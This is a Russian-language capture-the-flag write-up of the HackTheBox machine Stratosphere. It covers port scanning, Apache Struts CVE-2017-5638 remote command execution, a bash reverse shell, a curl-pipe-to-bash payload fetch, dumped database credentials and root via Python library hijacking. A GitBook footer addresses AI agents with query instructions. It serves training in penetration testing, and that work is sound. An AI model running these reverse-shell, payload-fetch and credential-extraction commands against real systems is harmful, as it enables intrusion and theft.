> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/linux-medium/stratosphere-hackthebox-writeup.md).

# Разбор HackTheBox Stratosphere

{% embed url="<https://app.hackthebox.com/machines/437>" %}

{% hint style="warning" %}
**Навыки:**

* Эксплуатация Apache Struts (CVE-2017-5638)
* Перехват библиотеки Python (повышение привилегий)
  {% endhint %}

## Разведка

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.

<figure><img src="/files/18cfa7a4e05a2e81b0cdb9bd5b5c8724f182e56c" alt="" width="563"><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/989b9b87fe7020a4f1a3f5b34e64306221e5ece9" alt="" width="563"><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**

Перечислите открытые порты и экспортируйте результаты в файл "allPorts" в каталоге Nmap:

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.64 -oG allPorts
```

<figure><img src="/files/a55a6efc9c610316cdccebfca8b5eb458cde757c" alt=""><figcaption></figcaption></figure>

**Анализ открытых портов с ExtractPorts (**&#x32;2.80.808&#x30;**)**

Использование функции extractPorts для краткого отображения открытых портов и копирования их в буфер обмена.

<figure><img src="/files/c55bfa26229113f9a30324f06da6322bfa25d717" alt="" width="563"><figcaption></figcaption></figure>

**Сканирование версий портов с Nmap:**

Использование Nmap для сканирования версий портов и извлечения информации в файле "targeted"

```bash
nmap -sCV -p22,80,8080 10.10.10.64 -oN targeted
```

<figure><img src="/files/a293dd19c96f978bc98bb6bf44d5165b9c5fa3e2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/50e7be1565b2abb66bb0c2ee3527bea6a9206536" alt=""><figcaption></figcaption></figure>

### /*/Исследование веб-сервисов (порты 80 и 8080) //*

Порты 80 и 8080 размещают один и тот же веб-сайт.

<figure><img src="/files/2c7dbfb185a53b12462bdb2749639b0016ae8069" alt=""><figcaption></figcaption></figure>

### Фаззинг с **Gobuster**

Мы запускаем `Gobuster` чтобы найти интересные каталоги

{% code overflow="wrap" %}

```bash
gobuster dir -u http://10.10.10.64/ -b 404,400 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -r
```

{% endcode %}

Мы обнаруживаем следующие пути:

* `/manager` - Интерфейс Tomcat Manager
* `/monitoring` - Раздел мониторинга

<figure><img src="/files/194a3479d9743e8e9e9112b430f8a6db199db147" alt=""><figcaption></figcaption></figure>

### Manager - Tomcat :

<figure><img src="/files/f6c0eeee726a86e0ae60444954475bdf76b35fe9" alt=""><figcaption></figcaption></figure>

### Мониторинг:

<figure><img src="/files/e973da55e3df63e5a381c83dd6d7edb8442b9966" alt=""><figcaption></figcaption></figure>

## Эксплуатация Apache Struts (CVE-2017-5638)

#### **Исследование каталога Monitoring**

При попытке зарегистрироваться мы получаем сообщение об ошибке. Также мы замечаем расширение `.action`, что потенциально указывает на приложение на основе Apache Struts

<figure><img src="/files/c8017efe03be58468d5340d7a8ad62fca37dea74" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/mazen160/struts-pwn>" %}

Мы используем `struts-pwn.py` для проверки удалённого выполнения команд:

```bash
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Register.action -c 'id'
```

Команда работает, подтверждая уязвимость.

<figure><img src="/files/a6d6da2d6c57e1816a78f40a6bf5538556db9141" alt=""><figcaption></figcaption></figure>

#### **Обратная оболочка**

1. Прослушивание с Netcat:

```bash
nc -nvlp 443
```

2. Создание `index.html` файл, содержащий нашу обратную оболочку:

```
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.69/443 0>&1
```

3. Размещаем файл с помощью веб-сервера Python:

```
python3 -m http.server 8080
```

4. Запускаем обратную оболочку через эксплойт:

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Register.action -c 'curl http://10.10.14.69:8080 | bash'
```

{% endcode %}

К сожалению, этот подход не срабатывает.

### **Извлечение конфиденциальной информации**

Мы перечисляем файлы на сервере:

<figure><img src="/files/913907338bec57b61d2ab6c637ba76605d3df80e" alt=""><figcaption></figcaption></figure>

Мы обнаруживаем `db_connect` файл. Отправив его, мы получаем учетные данные:

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Register.action -c 'ls -l'
```

{% endcode %}

<figure><img src="/files/d222da43af734734ce49a38e42b42df7cba75173" alt=""><figcaption></figcaption></figure>

Информация, полученная из учетных данных MySQL:

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Register.action -c 'cat db_connect'
```

{% endcode %}

* user: ssn/\_admin / admin
* pass=AWs64\@on/\*& / admin

<figure><img src="/files/8d33039edc3a9b5d1d316382cc0687755d64be5e" alt=""><figcaption></figcaption></figure>

### Извлечение информации — mysqlshow

#### **Перечисление баз данных**

Мы используем `mysqlshow` чтобы перечислить базы данных, доступные пользователю `admin` используя уязвимость Struts через `struts-pwn.py`:

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u "http://10.10.10.64/Monitoring/example/Register.action" -c "mysqlshow -u admin -padmin"
```

{% endcode %}

<figure><img src="/files/d4bd8dd08539d06db64acc4a942edeabbda100a7" alt=""><figcaption></figcaption></figure>

Это позволяет нам определить базу данных **users**.

#### **Сводка таблиц**

Затем мы перечисляем таблицы из базы **users**:

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u "http://10.10.10.64/Monitoring/example/Register.action" -c "mysqlshow -u admin -padmin users
```

{% endcode %}

<figure><img src="/files/e66e590ebdd744c4c76822d554feb08ecdd3ced4" alt=""><figcaption></figcaption></figure>

#### **Перечисление столбцов и извлечение учетных данных**

Теперь мы перечисляем столбцы таблицы **accounts** и пытаемся извлечь ее содержимое

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u "http://10.10.10.64/Monitoring/example/Register.action" -c "mysqlshow -u admin -padmin users accounts"
```

{% endcode %}

<figure><img src="/files/a0b6397ca4aa8e1132637714bc8e37eaa323f365" alt=""><figcaption></figcaption></figure>

Мы получаем следующую информацию:

* **Имя пользователя**: `richard`
* **Пароль**: `9tc*rhKuG5TyXvUJOrE^5CK7k`

{% code overflow="wrap" %}

```bash
python struts-pwn.py -u "http://10.10.10.64/Monitoring/example/Register.action" -c 'mysql -u admin -padmin -e "Select * from accounts" users'
```

{% endcode %}

<figure><img src="/files/d64b234ae45e7ea022e66ad5142ee5a8c3ab716b" alt=""><figcaption></figcaption></figure>

Используем найденную информацию для подключения по SSH к целевой машине:

```bash
ssh richard@10.10.10.64
```

<figure><img src="/files/c45a2eb8b4e52cc00adcca83e15cb499a6706d9c" alt=""><figcaption></figcaption></figure>

### Флаг user.txt :)

<figure><img src="/files/7f6bbe5c4b4a864182e4ef40035c6a0f81c8033c" alt="" width="563"><figcaption></figcaption></figure>

## Повышение привилегий

### Перехват библиотеки Python: повышение привилегий

Сначала выполните следующую команду, чтобы вывести список `sudo` прав:

<figure><img src="/files/65a75dc68e2bbf60c9d7042e9afb68bec10497cd" alt=""><figcaption></figcaption></figure>

Мы отмечаем, что у нас есть разрешение запускать Python-скрипт от имени `root`:

```bash
(ALL) NOPASSWD: /usr/bin/python3.7 /home/richard/test.py
```

<figure><img src="/files/d59d8aa9d5293346dffc4ab34ecac16cc5e343da" alt=""><figcaption></figcaption></figure>

Анализируя `/home/richard/test.py` скрипт, можно заметить, что он импортирует модуль, не указывая его абсолютный путь, например:

```
import os
os.system("bash")
```

Затем мы запускаем скрипт от имени `root`:

```bash
sudo /usr/bin/python3.7 /home/richard/test.py
```

* После запуска скрипта наша вредоносная версия `файл hashlib.py` загружается, запуская оболочку с `root` привилегиями.

<figure><img src="/files/e18eb561fdfff6e8a8a7236972f5a9a0d2e87e6e" alt=""><figcaption></figcaption></figure>

### Флаг root.txt :)

<figure><img src="/files/ec1091b83c394f898cc50448084ae73016099782" alt="" width="546"><figcaption></figcaption></figure>

<figure><img src="/files/7de0babc881c1c0b3ce404dd70106b601273eddb" alt="" width="375"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/linux-medium/stratosphere-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
